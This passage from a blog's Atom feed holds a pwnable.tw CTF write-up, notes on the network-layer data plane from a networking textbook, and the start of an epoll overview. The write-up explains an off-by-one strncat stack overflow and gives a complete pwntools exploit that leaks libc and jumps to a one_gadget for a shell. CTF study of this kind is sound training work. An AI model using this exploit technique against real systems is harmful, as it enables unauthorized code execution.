&lt;/ul&gt;
&lt;p&gt;Note that this fuzzer is currently experimental and may be unstable; it is intended for study and research only.&lt;/p&gt;</summary>
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
  </entry>
  
  <entry>
    <title>Selected Pwnable.tw Write-ups, Part 2</title>
    <link href="https://kiprey.github.io/2021/09/pwnable-tw-2/"/>
    <id>https://kiprey.github.io/2021/09/pwnable-tw-2/</id>
    <published>2021-09-23T03:12:44.000Z</published>
    <updated>2025-11-24T03:59:40.071Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><p>This post collects write-ups for some of the <a href="http://pwnable.tw">pwnable.tw</a> challenges I have solved.</p><span id="more"></span><h2 id="一、silver-bullet">I. silver_bullet</h2><h3 id="1-环境配置">1. Environment Setup</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">patchelf --replace-needed ./libc_32.so.6 /home/Kiprey/Desktop/Pwn/libc_32.so.6 ./silver_bullet</span><br><span class="line">patchelf --set-interpreter /mylibs/2.23-0ubuntu10_i386/ld-2.23.so ./silver_bullet</span><br></pre></td></tr></table></figure><h3 id="2-查看保护">2. Checking Protections</h3><p><img src="/2021/09/pwnable-tw-2/image-20210909104505396.png" alt="image-20210909104505396"></p><p>No canary &amp;&amp; No PIE.</p><h3 id="3-运行流程">3. Program Flow</h3><ul><li><p>In <code>create_bullet</code>, the program asks the user for a string and stores its length at a fixed location.</p><p><img src="/2021/09/pwnable-tw-2/image-20210909135701700.png" alt="image-20210909135701700"></p><blockquote><p>The assembly is a little clearer than the pseudocode here.</p></blockquote><p>As shown, the program reads the string into the buffer <code>char s[0x30]</code> and stores its length at the address of <code>s[0x30]</code>, that is, immediately after the buffer.</p></li><li><p>In <code>power_up</code>, the program reads up to <code>0x30-strlen(s)</code> more bytes and appends them to the string already in the buffer.</p><p><img src="/2021/09/pwnable-tw-2/image-20210909140110048.png" alt="image-20210909140110048"></p><p>The key flaw lies in how <code>strncat</code> is used. The Linux manual page says:</p><blockquote><p><strong>If src contains n or more bytes, strncat() writes n+1 bytes to dest</strong> (n from  src  plus  the  terminating  null byte).  
Therefore, <strong>the size of dest must be at least strlen(dest)+n+1.</strong></p></blockquote><p>This gives an off-by-one bug: when the buffer is filled exactly, the terminating null byte <strong>overwrites the memory that stores the string length with 0</strong>. On the next call to <code>power_up</code> the length therefore reads as 0, so more data can still be appended to the existing string, which results in a <strong>stack overflow</strong>.</p></li><li><p>To exploit the stack overflow we want main to return normally, so that the overwritten return address can redirect execution anywhere we like. For main to return normally, however, <code>beat</code> must return 1.</p><p><img src="/2021/09/pwnable-tw-2/image-20210909151949446.png" alt="image-20210909151949446"></p><p>The monster's HP is 0x7fffffff, and the bullet's attack power is the value stored at s[0x30]. During the <code>power_up</code> overflow we can first overwrite s[0x30] with a very large value, so that after the remaining code has run, the final value of s[0x30] is still very large:</p><p><img src="/2021/09/pwnable-tw-2/image-20210909152350997.png" alt="image-20210909152350997"></p><p>This is what finally lets us return from main.</p></li><li><p>For the exploit itself, we can first leak a function address from the GOT, compute the libc base address, then compute the addresses of system and the /bin/sh string, jump back to main, overwrite the return address again with system, and run /bin/sh. Alternatively, a one_gadget gets the job done in one shot.</p></li></ul><h3 id="4-Exploit">4. Exploit</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span 
class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">ELFname = <span class="string">&quot;./silver_bullet&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) &gt; <span class="number">1</span>:</span><br><span class="line">    io = remote(<span class="string">&quot;chall.pwnable.tw&quot;</span>, <span class="number">10103</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = process(ELFname)</span><br><span class="line"></span><br><span 
class="line">libc = ELF(<span class="string">&quot;./libc_32.so.6&quot;</span>)</span><br><span class="line">e = ELF(ELFname)</span><br><span class="line"></span><br><span class="line">sla = <span class="keyword">lambda</span> msg, content : io.sendlineafter(msg, content)</span><br><span class="line">sl = <span class="keyword">lambda</span> content : io.sendline(content)</span><br><span class="line">rv = <span class="keyword">lambda</span> x=<span class="literal">None</span> : io.recv(x)</span><br><span class="line">ru = <span class="keyword">lambda</span> msg : io.recvuntil(msg)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>(<span class="params">msg = <span class="string">&quot;&quot;</span></span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) == <span class="number">1</span>:</span><br><span class="line">        gdb.attach(io, msg)</span><br><span class="line"></span><br><span class="line">context(terminal=[<span class="string">&#x27;gnome-terminal&#x27;</span>, <span class="string">&#x27;-x&#x27;</span>, <span class="string">&#x27;bash&#x27;</span>, <span class="string">&#x27;-c&#x27;</span>], os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create_bullet</span>(<span class="params">bullet</span>):</span><br><span class="line">    sla(<span class="string">&quot;Your choice :&quot;</span>, <span class="string">&quot;1&quot;</span>)</span><br><span class="line">    sla(<span class="string">&quot;Give me your description of bullet :&quot;</span>, bullet)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span 
class="title function_">power_up</span>(<span class="params">bullet</span>):</span><br><span class="line">    sla(<span class="string">&quot;Your choice :&quot;</span>, <span class="string">&quot;2&quot;</span>)</span><br><span class="line">    sla(<span class="string">&quot;Give me your another description of bullet :&quot;</span>, bullet)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">beat</span>():</span><br><span class="line">    sla(<span class="string">&quot;Your choice :&quot;</span>, <span class="string">&quot;3&quot;</span>)</span><br><span class="line"></span><br><span class="line">one_gadget_offset = <span class="number">0x5f065</span> <span class="comment"># 1. esi is the GOT address of libc; 2. eax == NULL</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">buffoverflow</span>(<span class="params">data</span>):</span><br><span class="line">        create_bullet(<span class="string">&quot;a&quot;</span>*<span class="number">0x20</span>)</span><br><span class="line">        power_up(<span class="string">&quot;a&quot;</span>*<span class="number">0x10</span>)</span><br><span class="line">        power_up(<span class="string">&quot;\xff\xff\x7f&quot;</span> + <span class="string">&quot;a&quot;</span>*<span class="number">4</span> + data)</span><br><span class="line">        beat()</span><br><span class="line">        beat()</span><br><span class="line">    </span><br><span class="line">    buffoverflow(flat(p32(e.plt[<span class="string">&quot;printf&quot;</span>]), </span><br><span class="line">                      p32(e.symbols[<span class="string">&#x27;main&#x27;</span>]), </span><br><span class="line">                      p32(e.got[<span 
class="string">&quot;puts&quot;</span>])))</span><br><span class="line"></span><br><span class="line">    ru(<span class="string">&quot;Oh ! You win !!\n&quot;</span>)</span><br><span class="line">    debug()</span><br><span class="line">    puts_got = u32(rv(<span class="number">4</span>))</span><br><span class="line">    log.info(<span class="string">&quot;puts got addr: &quot;</span> + <span class="built_in">hex</span>(puts_got))</span><br><span class="line"></span><br><span class="line">    libc_base = puts_got - libc.symbols[<span class="string">&quot;puts&quot;</span>]</span><br><span class="line">    log.info(<span class="string">&quot;libc base addr: &quot;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">    one_gadget_addr = libc_base + one_gadget_offset</span><br><span class="line">    log.info(<span class="string">&quot;one_gadget addr: &quot;</span> + <span class="built_in">hex</span>(one_gadget_addr))</span><br><span class="line"></span><br><span class="line">    buffoverflow(p32(one_gadget_addr))</span><br><span class="line"></span><br><span class="line">    io.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;This post collects write-ups for some of the &lt;a href=&quot;http://pwnable.tw&quot;&gt;pwnable.tw&lt;/a&gt; challenges I have solved.&lt;/p&gt;</summary>
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
    <category term="pwnable.tw" scheme="https://kiprey.github.io/tags/pwnable-tw/"/>
    
  </entry>
  
  <entry>
    <title>Computer Networking Notes, Part 2</title>
    <link href="https://kiprey.github.io/2021/05/cnatda-2/"/>
    <id>https://kiprey.github.io/2021/05/cnatda-2/</id>
    <published>2021-05-24T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.862Z</updated>
    
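    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>These are my notes from reading “Computer Networking: A Top-Down Approach”, in condensed form.</li><li>This part covers<ul><li>Chapter 4: The Network Layer: Data Plane</li></ul></li></ul><span id="more"></span><h2 id="第四章：网络层：数据平面">Chapter 4: The Network Layer: Data Plane</h2><h3 id="1-网络层概述">1. Overview of the Network Layer</h3><ul><li><p>The network layer is arguably the most complex layer in the protocol stack. It can be decomposed into two interacting parts: the <strong>data plane</strong> and the <strong>control plane</strong>.</p><ul><li>Data plane: the <strong>per-router</strong> functions of the network layer, which determine how a datagram arriving on one of a router's input links is forwarded to one of that router's output links.</li><li>Control plane: the <strong>network-wide</strong> logic, which controls how a datagram is routed among routers along the end-to-end path from the source host to the destination host.</li></ul></li><li><p>The role of the network layer is to move packets from a sending host to a receiving host. Two important network-layer functions are involved:</p><ul><li>Forwarding. When a packet arrives at a router's input link, the router must move it to the appropriate output link. <strong>Forwarding is one function implemented in the data plane</strong>, and the most common and important one.</li><li>Routing. The network layer must determine the route or path taken by packets. The algorithms that compute these paths are called <strong>routing algorithms</strong>.</li></ul><p>Note that <strong>forwarding</strong> and <strong>routing</strong> are two distinct terms.</p><ul><li><strong>Forwarding</strong> is the router-local action of moving a packet from an input link interface to the appropriate output link interface. It takes place on a very short timescale, typically a few nanoseconds.</li><li><strong>Routing</strong> is the network-wide process that determines the end-to-end path a packet takes from source to destination. It takes place on a much longer timescale, typically seconds.</li></ul><p>Every router has a <strong>forwarding table</strong>. A router examines one or more fields in the header of an arriving packet, uses those header values to index into its forwarding table, and forwards the packet accordingly.</p><p>The forwarding table can be configured in two ways:</p><ul><li><p>The traditional approach. The <strong>routing algorithm</strong> determines the contents of the router's forwarding table. The routing algorithm in one router communicates with the routing algorithms in other routers to compute its forwarding-table values. This communication takes place by exchanging <strong>routing messages</strong> that <strong>contain routing information</strong>, <strong>according to a routing protocol</strong>.</p><p><img src="/2021/05/cnatda-2/image-20210515175625818.png" alt="image-20210515175625818"></p></li><li><p>The SDN approach. A remote controller computes and distributes the forwarding tables used by each router. The control-plane routing functionality is separated from the physical router: the routing device performs forwarding only, while the remote controller computes and distributes the forwarding tables. The figure below is an example of <strong>software-defined networking (SDN)</strong>:</p><p><img src="/2021/05/cnatda-2/image-20210515175645704.png" alt="image-20210515175645704"></p></li></ul></li><li><p>Network service model</p><ul><li>The Internet's network layer provides a single service, known as <strong>best-effort service</strong>.</li><li>By convention, the term <strong>packet switch</strong> means a general packet-switching device that transfers a packet from an input link interface to an output link interface according to values in the fields of the packet header.<ul><li>Some packet switches, called <strong>link-layer switches</strong>, base their forwarding decision on the values of fields in the <strong>link-layer frame</strong>; they are therefore <strong>link-layer devices</strong>.</li><li>Other packet switches, called <strong>routers</strong>, base their forwarding decision on header field values in the <strong>network-layer datagram</strong>. Routers are therefore <strong>network-layer devices</strong>.</li></ul></li></ul></li></ul>
<h3 id="2-路由器工作原理">2. What's Inside a Router</h3><h4 id="a-通用路由器体系结构">a. Generic Router Architecture</h4><p><img src="/2021/05/cnatda-2/image-20210515181508354.png" alt="image-20210515181508354"></p><ul><li>Input ports.<ul><li>Perform the physical-layer function of terminating the <strong>incoming physical link</strong> at the router (the outermost box).</li><li>Perform the link-layer functions needed to interoperate with the link layer at the far end of the <strong>incoming link</strong> (the middle box).</li><li>Perform the lookup function (the innermost box). This is where the forwarding table is consulted to determine the router output port to which an arriving packet is forwarded via the switching fabric.</li></ul></li><li>Switching fabric. It connects the router's input ports to its output ports.</li><li>Output ports. An output port stores packets received from the switching fabric and transmits them on the outgoing link by performing the necessary link-layer and physical-layer functions.</li><li>Routing processor. It performs control-plane functions, such as maintaining routing tables and the associated link-state information and computing the forwarding table.</li></ul><h4 id="b-输入-输出端口处理-基于目的地转发">b. Input/Output Port Processing &amp; Destination-Based Forwarding</h4><p>The input port's line-termination function and link-layer processing implement the physical and link layers for that individual input link. The forwarding table is copied from the routing processor to the line cards over a separate bus. Forwarding decisions can therefore be <strong>made locally at each input port</strong>, <strong>using the copy of the forwarding table held at that port</strong>, which improves efficiency.</p><p><img src="/2021/05/cnatda-2/image-20210515185638281.png" alt="image-20210515185638281"></p><p>Output port processing is similar to input port processing: it selects and dequeues queued packets for transmission and performs the required link-layer and physical-layer transmission functions.</p><p><img src="/2021/05/cnatda-2/image-20210515190039325.png" alt="image-20210515190039325"></p><p>When several forwarding-table entries match, the router applies the <strong>longest prefix matching rule</strong>: it finds the longest matching entry in the table and forwards the packet to the link interface associated with that longest prefix match.</p><h4 id="c-交换">c. Switching</h4><p>The switching fabric sits at the very heart of a router; it is through this fabric that packets are actually switched from an input port to an output port. Switching can be accomplished in a number of ways:</p><p><img src="/2021/05/cnatda-2/image-20210515190159433.png" alt="image-20210515190159433"></p><h4 id="d-排队">d. 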
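Queuing</h4><p><strong>Packet loss</strong> occurs when the router's buffer space is exhausted and no memory is available to store arriving packets; this is what is meant by packets being <strong>lost in the network</strong> or <strong>dropped at a router</strong>. Queues can form in two places: at the input ports and at the output ports.</p><blockquote><p>The discussion below assumes that</p><ul><li>all links have the same speed;</li><li>a packet can be transferred from any input port to a given output port in the same amount of time it takes to receive a packet on an input link;</li><li>packets are moved from a given input queue to their desired output queue in FCFS (first-come, first-served) order. <strong>Multiple packets can be transferred in parallel as long as their output ports differ</strong>.</li></ul></blockquote><p><strong>Input queuing</strong>:</p><ul><li><p>If the switching fabric is not fast enough to transfer all arriving packets through it without delay, packets also queue at the input ports, because arriving packets must join the input port queue to wait their turn to be transferred through the fabric to the output port.</p></li><li><p>If the two packets at the front of two input queues are destined for the same output queue, one of them is blocked and must wait in its input queue, because the switching fabric can transfer only one packet to a given output port at a time.</p></li><li><p><strong>Head-of-the-line (HOL)</strong> blocking in an input-queued switch: a packet queued in an input queue <strong>must wait</strong> to be transferred through the fabric <strong>because it is blocked by another packet at the head of the line</strong>, even though its own output port is free.</p><p><img src="/2021/05/cnatda-2/image-20210515192933636.png" alt="image-20210515192933636"></p></li></ul><p><strong>Output queuing</strong>:</p><ul><li><p>When there is not enough memory to buffer an incoming packet, a decision must be made:</p><ul><li>either drop the arriving packet (the <strong>drop-tail</strong> policy),</li><li>or remove one or more already-queued packets to make room for the newly arrived packet.</li></ul><p>In some cases, dropping a packet (or marking its header) <strong>before</strong> the buffer is full provides an <strong>early</strong> congestion signal to the sender. These packet-dropping and packet-marking policies are collectively known as <strong>active queue management (AQM) algorithms</strong>. The <strong>Random Early Detection (RED) algorithm</strong> is one of the most widely studied and implemented AQM algorithms.</p></li></ul><p>The rule of thumb for sizing router buffers is that the amount of buffering (B) should equal the average round-trip time (RTT) multiplied by the link capacity (C), that is, $B = RTT \cdot C$. This result is based on an analysis of the queuing dynamics of a <strong>relatively small number</strong> of TCP flows.</p><blockquote><p>For example, a 10 Gbps link with an RTT of 250 ms needs a buffer of B = 0.25 s × 10 Gbps = 2.5 Gb.</p></blockquote><p>More recent work suggests that when a <strong>large number of TCP flows</strong> ($n$) pass through a link, the amount of buffering needed is $B = RTT \cdot C / \sqrt{n}$.</p><h4 id="e-分组调度">e. 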
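Packet Scheduling</h4><ul><li><p>First-in, first-out (FIFO).</p></li><li><p>Priority queuing</p><ul><li>Under priority queuing, packets arriving at the output link are classified into priority classes at the output queue. Each priority class typically has its own queue. When choosing a packet to transmit, the priority queuing discipline transmits a packet from the <strong>highest priority class</strong> that has a <strong>nonempty</strong> queue. The choice among packets in the <strong>same priority class</strong> is typically made in FIFO order.</li><li>Under <strong>non-preemptive priority queuing</strong>, the transmission of a packet is not interrupted once it has begun.</li></ul></li><li><p>Round robin and weighted fair queuing</p><ul><li><p>Under the <strong>round robin queuing discipline</strong>, packets are <strong>sorted into classes</strong> as with priority queuing. However, there is <strong>no strict service priority among classes</strong>; a round robin scheduler <strong>alternates service</strong> among the classes. A so-called <strong>work-conserving queuing discipline</strong> never allows the link to remain idle whenever packets of any class are queued for transmission. When it looks for a packet of a given class and finds none, it immediately checks the next class in the round robin sequence.</p></li><li><p>A generalized form of round robin queuing that has been widely implemented in routers is the <strong>weighted fair queuing (WFQ) discipline</strong>. The difference is that each class may receive a <strong>different amount</strong> of service in any interval of time: class i is guaranteed a fraction of service equal to $W_i / W$, where $W$ is the sum of the weights of all classes that have packets queued.</p><p><img src="/2021/05/cnatda-2/image-20210515201004707.png" alt="image-20210515201004707"></p></li></ul></li></ul>
<h3 id="3-网际协议：IPv4、寻址、IPv6-及其他">3. The Internet Protocol: IPv4, Addressing, IPv6, and More</h3><h4 id="1-IPv4数据报格式">1. IPv4 Datagram Format</h4><p>Network-layer packets are referred to as <strong>datagrams</strong>. The IPv4 datagram format is shown below:</p><p><img src="/2021/05/cnatda-2/image-20210515212314203.png" alt="image-20210515212314203"></p><p>The key fields are as follows:</p><ul><li><p><strong>Version (number)</strong>. These 4 bits specify the IP protocol version of the datagram. By looking at the version number, the router can determine how to interpret the remainder of the datagram. Different IP versions use different datagram formats.</p></li><li><p><strong>Header length</strong>. Because an IPv4 datagram can contain a variable number of options, these 4 bits are needed to determine where the payload actually begins. Most IP datagrams do not contain options, so the typical header is <strong>20 bytes</strong> long.</p></li><li><p><strong>Type of service</strong>. The type of service (TOS) bits are included in the IPv4 header so that different types of IP datagrams can be distinguished from each other.</p></li><li><p><strong>Datagram length</strong>. The total length of the IP datagram (header plus data). This field is 16 bits wide.</p></li><li><p><strong>Identifier, flags, fragmentation offset</strong>. These fields have to do with <strong>IP fragmentation (important)</strong>.</p></li><li><p><strong>Time-to-live (TTL)</strong>. This field ensures that datagrams do not circulate forever in the network. It is decremented by 1 each time the datagram is processed by a router. If the TTL field reaches 0, the datagram must be dropped.</p></li><li><p><strong>Protocol</strong>. This field is typically used only when the datagram reaches its final destination; it indicates the specific transport-layer protocol to which the data portion of the datagram should be passed. For example, a value of 6 indicates TCP and 17 indicates UDP.</p></li><li><p><strong>Header checksum</strong>. It helps a router detect bit errors in the <strong>header</strong> of a received IP datagram. A router computes the header checksum for each received datagram and, if it detects an error, typically discards the datagram.</p><p>Note that the checksum must be recomputed and stored again at each router, because the TTL field, and possibly the options field as well, will change.</p><p>Why does TCP/IP perform error checking at both the transport and network layers? The reasons are:</p><ul><li><p>Only the IP header is checksummed at the IP layer, whereas the TCP/UDP checksum is computed over the entire TCP/UDP segment.</p></li><li><p>TCP/UDP and IP do not necessarily have to belong to the same protocol stack. In principle, TCP can run over a different network-layer protocol, and IP can carry data that is not passed to TCP/UDP.</p></li></ul></li><li><p><strong>Source and destination IP addresses</strong>. When a source creates a datagram, it inserts its IP address into the source IP address field and the address of the ultimate destination into the destination IP address field.</p><blockquote><p>Note: what TCP/UDP segments carry are source and destination <strong>port numbers</strong>; do not confuse the two.</p></blockquote></li><li><p><strong>Options</strong>. This field allows the IP header to be extended.</p></li><li><p><strong>Data</strong>. The payload being transported.</p></li></ul><h4 id="2-IPv4-数据报分片">2. IPv4 Datagram Fragmentation</h4><p><strong>Not all link-layer protocols can carry network-layer packets of the same size</strong>. The maximum amount of data that a link-layer frame can carry is called the <strong>maximum transmission unit (MTU)</strong>. The MTU of the link-layer protocol places a hard limit on the length of an IP datagram, and each link along a route may use a different link-layer protocol with a different MTU.</p><p>When a router receives an IP datagram and finds, on forwarding it, that <strong>the MTU of the outgoing link is smaller than the length of the datagram</strong>, it must <strong>fragment</strong> the payload of the IP datagram into two or more smaller IP datagrams, encapsulate each of them in a <strong>separate link-layer frame</strong>, and send these frames over the outgoing link. Each of these <strong>smaller datagrams</strong> is called a <strong>fragment</strong>.</p><p>Because of fragmentation, fragments need to be reassembled before they reach the transport layer at the destination. IPv4 leaves datagram reassembly to the <strong>end systems</strong> rather than to network routers.</p><p>When a destination host receives a series of datagrams from the same source, it needs to determine whether any of them <strong>are fragments of some original, larger datagram</strong>. If so, it must further determine <strong>when it has received the last fragment</strong> and <strong>how the fragments it has received should be pieced back together</strong> to form the original datagram. To allow this, IPv4 puts the <strong>identification</strong>, <strong>flag</strong>, and <strong>fragmentation offset</strong> fields in the IP datagram header. They are used as follows:</p><ul><li>When a datagram is created, the sending host stamps it with an identification number as well as the source and destination addresses.</li><li>The sending host typically increments the identification number for each datagram it sends.</li><li>When a router needs to fragment a datagram, each resulting fragment is stamped with the source address, destination address, and identification number of the original datagram.</li></ul><p>When the destination then receives a series of datagrams from the same sending host, it can examine their identification numbers to determine which of them are actually fragments of the same larger datagram.</p><blockquote><p>Note that the <strong>identification number</strong> here serves a different purpose from the <strong>sequence number</strong> in TCP; do not confuse the two!</p></blockquote><p>So that the destination host can be sure it <strong>has received the last fragment of the original datagram</strong>, <strong>the flag bit of the last fragment</strong> is set to 0, whereas the flag bit of all other fragments is set to 1. In addition, so that the destination host can determine whether a fragment is missing and reassemble the fragments in the proper order, the <strong>offset field</strong> specifies where the fragment fits within the original IP datagram.</p><h4 id="3-IPv4-编址">3. 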
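IPv4 Addressing</h4><ul><li><p>The boundary between a host and the physical link is called an <strong>interface</strong>. Because every host and router is capable of sending and receiving IP datagrams, IP requires each host and router interface to have its own IP address. Thus, <strong>an IP address is technically associated with an interface, rather than with the host or router containing that interface</strong>.</p><p>The figure below shows an example of IP addressing and interfaces. Four of the interfaces in one part of the figure are interconnected by a <strong>network that contains no routers</strong>, for example an Ethernet switch; such a network is drawn as a cloud here:</p><p><img src="/2021/05/cnatda-2/image-20210515222639352.png" alt="image-20210515222639352"></p></li><li><p>The network interconnecting these three host interfaces and one router interface forms a <strong>subnet</strong>. IP addressing assigns this subnet the address 223.1.1.0/24, where the <code>/24</code> notation, known as a <strong>subnet mask</strong>, indicates that the leftmost 24 of the 32 bits define the subnet address.</p><p>The IP definition of a subnet is not restricted to Ethernet segments that connect multiple hosts to a router interface. A subnet is defined as follows:</p><blockquote><p>To determine the subnets, detach each interface from its host or router, creating islands of isolated networks, with interfaces terminating the end points of the isolated networks. Each of these isolated networks is called a <strong>subnet</strong>.</p></blockquote><p>A simple example:</p><p><img src="/2021/05/cnatda-2/image-20210515225343646.png" alt="image-20210515225343646"></p></li><li><p>The Internet's address assignment strategy is known as <strong>Classless Interdomain Routing (CIDR)</strong>. As with subnet addressing, the 32-bit IP address is divided into two parts and has the dotted-decimal form <code>a.b.c.d/x</code>, where x indicates the <strong>number of bits in the first part</strong> of the address. The x most significant bits of an address of the form <code>a.b.c.d/x</code> constitute the network portion of the IP address and are often referred to as the <strong>prefix</strong> of the address.</p><blockquote><p>Note: forwarding tables use the <strong>longest prefix matching</strong> rule.</p></blockquote></li><li><p>Before CIDR was adopted, the network portion of an IP address was constrained to be 8, 16, or 24 bits long, an addressing scheme known as <strong>classful addressing</strong>, so named because <strong>subnets with 8-, 16-, and 24-bit subnet addresses were known as class A, B, and C networks, respectively</strong>.</p></li><li><p><code>255.255.255.255</code> is the IP <strong>broadcast address</strong>. When a host sends a datagram with destination address <code>255.255.255.255</code>, the message is delivered to all hosts on the same subnet. Routers optionally forward the message into neighboring subnets as well.</p></li><li><p><strong>Obtaining a host address: the Dynamic Host Configuration Protocol</strong></p><ul><li><p>The <strong>Dynamic Host Configuration Protocol (DHCP)</strong> allows a host to obtain an IP address automatically. In addition to IP address assignment, DHCP also lets a host learn its subnet mask, the address of its first-hop router (the <strong>default gateway</strong>), the address of its local DNS server, and so on. Because DHCP automates the network-related aspects of connecting a host to a network, it is often called a <strong>plug-and-play</strong> or <strong>zeroconf</strong> (zero-configuration) protocol.</p></li><li><p>DHCP is a client-server protocol. A client is typically a newly arriving host that wants to obtain network configuration information, including an IP address for itself. In the simplest case, each subnet has a DHCP server. If no server is present on a subnet, a DHCP relay agent (typically a router) that knows the address of a DHCP server for that network is needed.</p></li><li><p>DHCP assigns an address to a newly arriving client in the following steps:</p><ul><li><p><strong>DHCP server discovery</strong>. The first task of a newly arriving host is to find a DHCP server with which to interact, which it does using a <strong>DHCP discover message</strong>.</p><p>The client sends the discover message in a UDP packet to port 67, with the broadcast address <code>255.255.255.255</code> as the destination IP address and the “this host” address <code>0.0.0.0</code> as the source IP address.</p></li><li><p><strong>DHCP server offer(s)</strong>. A DHCP server that receives a DHCP discover message responds to the client with a <strong>DHCP offer message</strong>, which is broadcast to all nodes on the subnet, again using the IP broadcast address. Because several DHCP servers may be present on the subnet, the client may be able to choose from among several offered IP addresses.</p><p>Each server offer message contains the <strong>transaction ID of the received discover message</strong>, the <strong>proposed IP address for the client</strong>, the <strong>network mask</strong>, and an <strong>IP address lease time</strong>.</p></li><li><p><strong>DHCP request</strong>. The newly arriving client chooses from among one or more server offers and responds to its selected offer with a <strong>DHCP request message</strong>, echoing back the configuration parameters.</p></li><li><p><strong>DHCP ACK</strong>. The server responds to the DHCP request message with a <strong>DHCP ACK message</strong>, confirming the requested parameters.</p></li></ul><p><img src="/2021/05/cnatda-2/image-20210515233546620.png" alt="image-20210515233546620"></p></li></ul></li></ul><h4 id="4-网络地址转换">4. Network Address Translation</h4><p>With network address translation (<strong>NAT</strong>), a NAT-enabled router does <strong>not</strong> look like a router to the outside world; it behaves like a <strong>single</strong> device with a <strong>single</strong> IP address, so that the router <strong>hides the details of the internal network</strong> from the outside world.</p>]]></content>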
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;These are my notes from reading “Computer Networking: A Top-Down Approach”, in condensed form.&lt;/li&gt;
&lt;li&gt;This part covers
&lt;ul&gt;
&lt;li&gt;Chapter 4: The Network Layer: Data Plane&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
  </entry>
  
  <entry>
    <title>A Brief Look at epoll</title>
    <link href="https://kiprey.github.io/2021/05/epoll/"/>
    <id>https://kiprey.github.io/2021/05/epoll/</id>
    <published>2021-05-21T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.002Z</updated>
    
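    <content type="html"><![CDATA[<h2 id="一、概述">I. Overview</h2><ul><li><p>epoll is the Linux kernel's improved version of poll, designed to handle large numbers of file descriptors; it is an enhanced version of the select/poll I/O multiplexing interfaces on Linux. epoll can significantly improve CPU efficiency when only a few of a large number of concurrent connections are active.</p></li><li><p>A server has to manage connections from many clients, but a call such as recv can wait on only a single socket, which is why select/poll were introduced.</p><p>However, the number of file descriptors that select can monitor is limited by FD_SETSIZE, usually 1024. That is clearly not enough for a server handling tens of thousands of concurrent connections. By contrast, the upper limit on fds supported by epoll is the maximum number of files that can be opened; the exact number can be checked with <code>cat /proc/sys/fs/file-max</code> (on my machine the value is <code>9223372036854775807</code>).</p></li><li><p>When only some sockets are <strong>active</strong>, traditional select/poll <strong>scans the entire socket set linearly</strong>, so efficiency drops linearly as the number of sockets grows. This is the reason select caps the number of descriptors it monitors: after being woken up, the program does not know which sockets are active and has to iterate over all of them.</p><p>epoll, in contrast, is implemented on top of a callback attached to each fd, so only active sockets are processed, which is more efficient.</p></li><li><p>Differences between select, poll, and epoll</p><ul><li>select: it only knows that some I/O event has occurred, not on which descriptor, so it has to scan every stream indiscriminately. Time complexity is $O(n)$, and the number of fds is 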